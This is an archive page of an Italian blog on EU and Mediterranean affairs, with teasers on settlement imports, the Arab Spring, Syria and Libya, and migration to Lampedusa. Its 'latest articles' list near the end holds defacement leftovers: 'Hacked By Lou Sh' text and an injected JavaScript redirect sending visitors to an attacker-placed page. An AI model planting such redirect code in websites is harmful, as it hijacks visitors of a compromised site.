EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
L’Europa ed il mediterraneo

it

A dispetto dei suoi interventi per una risoluzione del conflitto israelo-palestinese, l’UE continua ad importare prodotti provenienti da insediamenti illegali israeliani. 22 Organizzazioni non governative, laiche e cristiane, tra cui la Federazione Internazionale per i Diritti Umani (Fidh), Christian Aid (Irlanda e Regno Unito), IKV Pax Christi (Paesi Bassi) e la danese DanChurchAid, lo hanno denunciato in uno studio molto accurato realizzata in collaborazione con un ex Commissario europeo, l’olandese Hans van den Broek.

"Con decine di dichiarazioni ufficiali l’UE riafferma continuamente l’illegalità degli insediamenti secondo il diritto internazionale e -spiega Van den Broek- li considera come il maggiore ostacolo alla pace. Ma mentre la costruzione degli insediamenti accelera, noi europei non siamo riusciti a (...)

it

Il sito di riferimento è www.medmem.eu, consultabile in tre differenti lingue: inglese, francese ed arabo. I documenti digitalizzati a disposizione del navigatore sono molteplici, si parla di circa 4000 file, la maggior parte resi disponibili dall'Ina, l'Istituto Nazionale dell'Audiovisivo francese. Anche l'Unione europea ha giocato un ruolo fondamentale, rendendosi pienamente disponibile e presentando anch'essa molti documenti interessanti.

Med-Mem nasce con uno scopo ben preciso: valorizzare e condividere (e per i meno esperti scoprire) il vasto patrimonio che il Mediterraneo ci ha lasciato e che continua a lasciarci ogni giorno. La nascita del sito sembra quanto mai opportuna, considerata l’importanza che questo mare riveste (...)

it

L'Assemblea Parlamentare del Consiglio d'Europa vuole documentare il comportamento del dirigente elvetico nel periodo precedente all'elezione presidenziale. L'obiettivo del rapporto è accertare se Blatter fosse a conoscenza della corruzione di alcuni membri del massimo organismo calcistico mondiale.

“Il Consiglio d’Europa si occupi dei problemi dell’Europa e non dei problemi del calcio mondiale’’. Con questa dichiarazione ufficiale il Presidente della FIFA (Fédération Internationale de Football Association) Joseph Blatter il 23 aprile scorso ha commentato il rapporto reso pubblico (...)

it

"Dobbiamo guardare alla Tunisia e ai Paesi vicini non con occhi europei, ma africani. Ma dobbiamo, soprattutto, dare ai giovani protagonisti della primavera araba risposte concrete, per fare si' che il loro sogno diventi realtà".

La scelta dello Stato non è certamente casuale, infatti la Tunisia fu il primo paese (tra quelli che si affacciano sul Mediterraneo) a siglare, nel luglio del ’95, un accordo di associazione con l’Unione Europea. Le due giornate sono state aperte dalla conferenza del FEMIP, il Fondo Euro (...)

it

Il Parlamento europeo ha chiesto al presidente siriano Bashar al Assad di abbandonare immediatamente il potere e di mettere fine alle brutali repressioni contro i manifestanti. Proposto dagli eurodeputati anche un inasprimento delle già severe sanzioni contro Damasco, mirando al regime senza colpire la popolazione.

L’uccisione di Gheddafi e la fine del regime libico non ha di certo placato i venti della Primavera araba. Il processo di democratizzazione continua passando per la fase più cruenta in Siria. Damasco e dintorni da quasi un anno sono lo scenario di scontri gli oppositori del regime di Bashar al (...)

it

È stato infatti adottato un pacchetto di provvedimenti in grado di agevolare l’ingresso di studenti, ricercatori e uomini d'affari, con l’aggiunta di una clausola di salvaguardia con la quale sarà possibile rivedere la lista dei visti in caso di aumento improvviso dei flussi migratori.

Il nuovo pacchetto U.E. Garantire il regolare flusso dei lavoratori tenendo d’occhio il fenomeno degli immigrati clandestini. È questo in sostanza l’obiettivo preposto dal pacchetto di tre provvedimenti proposti a Bruxelles dal commissario europeo per gli affari interni, la diplomatica svedese (...)

it

Il capo della diplomazia Ue Catherine Ashton ha dichiarato davanti al Parlamento europeo che l'ufficio garantirà il sostegno del vecchio continente alla società civile e al consiglio nazionale di transizione. Si tratta, questo, di un ulteriore sostegno al Consiglio nazionale da parte dell’Europa, che intende contribuire alla “costruzione di una piena democrazia” in Libia.

La responsabile della diplomazia europea Catherine Ashton ha incontrato a Bengasi i capi dei ribelli per l’inaugurazione della rappresentanza europea, confermando la linea continuativa di collaborazione alla lotta contro il regime, personificata in questo caso dal presidente del Consiglio (...)

it

Da Bruxelles l’Unione Europea fa sapere di voler congelare il negoziato sull'accordo di associazione con la Siria e di adottare l’embargo sulla fornitura di armi e attrezzature, che potrebbero essere di nuovo usate in simili circostanze. Sulla stessa linea gli Stati Uniti, che varano sanzioni economiche contro Assad e famiglia, e l’ONU, che si batte anche per il rilascio dei prigionieri politici.

Dopo Tunisia, Egitto e Libia i venti infuocati si spostano sulla Siria. Le rivolte popolari scoppiate in Medio Oriente lo scorso marzo sono arrivate anche a Damasco, espandendosi a macchia d’olio nelle altre città siriane, soprattutto nella zona centro meridionale. La folla è scesa in piazza per (...)

27
04
2011

Pedine in gioco

it

Nel messaggio Urbi et orbi al termine della messa di Pasqua, Il Papa ha rivolto il suo pensiero "ai tanti profughi e ai rifugiati, che provengono da vari Paesi africani e sono stati costretti a lasciare gli affetti più cari". " A loro arrivi la solidarietà di tutti; gli uomini di buona volontà siano illuminati ad aprire il cuore all'accoglienza, affinché in modo solidale e concertato si possa venire incontro alle necessità impellenti di tanti fratelli".

Dopo una breve tregua, sono ripresi gli sbarchi di migranti a Lampedusa: nella scorsa settimana sono sbarcati i 221 profughi originari del centro Africa e dall’Asia e provenienti dalla Libia che hanno attraversato il Canale di Sicilia con il mare in tempesta. 60 tunisini hanno lasciato l’isola, (...)

11
04
2011

Quante Lampedusa?

it

Migliaia di disperati hanno attraversato i nostri confini, non più come stranieri, abitanti di un mondo lontano e ostile,ma come cittadini d'Europa. Questa Patria, un tempo tanto invocata, che oggi è guardata con sospetto e lontananza: un atteggiamento tutto meritato,vista la nostra capacità di accoglienza divenuta famosa grazie al tempo.

Così sale la nostalgia del muro e dei confini. Perché il Mediterraneo, in fondo, era un valido confine: un ostacolo da affrontare per coloro che decidevano di sfidare la sorte e affrontare un viaggio disumano stipati su barche adatte a trasportare bestie, più che uomini. Oggi anche quel muro è (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato




Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France